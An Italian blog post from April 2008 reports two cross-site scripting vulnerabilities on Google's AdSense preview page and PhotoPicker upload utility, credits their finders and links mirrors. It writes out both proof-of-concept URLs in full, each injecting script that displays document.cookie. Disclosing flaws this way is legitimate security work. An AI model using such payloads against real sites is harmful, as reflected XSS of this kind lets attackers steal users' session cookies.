Due nuove vulnerabilita’ per Google

Apr 11, 2008 | Category: Google Vulns

Entrambe scoperte ieri sono le vulnerabilita” xss scoperte sul sito di Google.

I siti interessati sono quello di adsense e dell”utility di PhotoPicker che permette l”upload di immagini.Author: Hikapa
Mirror: http://www.xssed.com/mirror/36391/

https://www.google.com/adsense/preview?snippet=%3Cscript%20type%3D%22text%2Fjavascript%22%3Ealert(document.cookie);%20%3C%2Fscript%3E

Author: mox
Mirror: http://www.xssed.com/mirror/35547/

http://www.google.com/s2/ui/photopicker.PhotoPicker?done=%22%3E&js=RAW&pop=TRUE&dn=%22%3E&profileMode=1&userId=%22%3Exss&urlEnabled=1&extraUploadParams=out%3D%22%3E%3CIMG%20%22%22%22%3E%3CSCRIPT%3Ealert(document.cookie)%3C/SCRIPT%3E%22%3E&suppressHide=1

Related posts:

  1. Three new XSS of Google: Knol, Books and Google!
  2. A vulnerability on groups.google.com has been founded
  3. Gmail.it – Nuova casella di posta, travata vulnerabilita’ XSS
  4. XSS google.com
  5. Google accounts SSL login page suffers from highly critical XSS

Bookmark and Share
Permalink Comments (0) Apr 11, 2008

Leave a Reply with your Google Account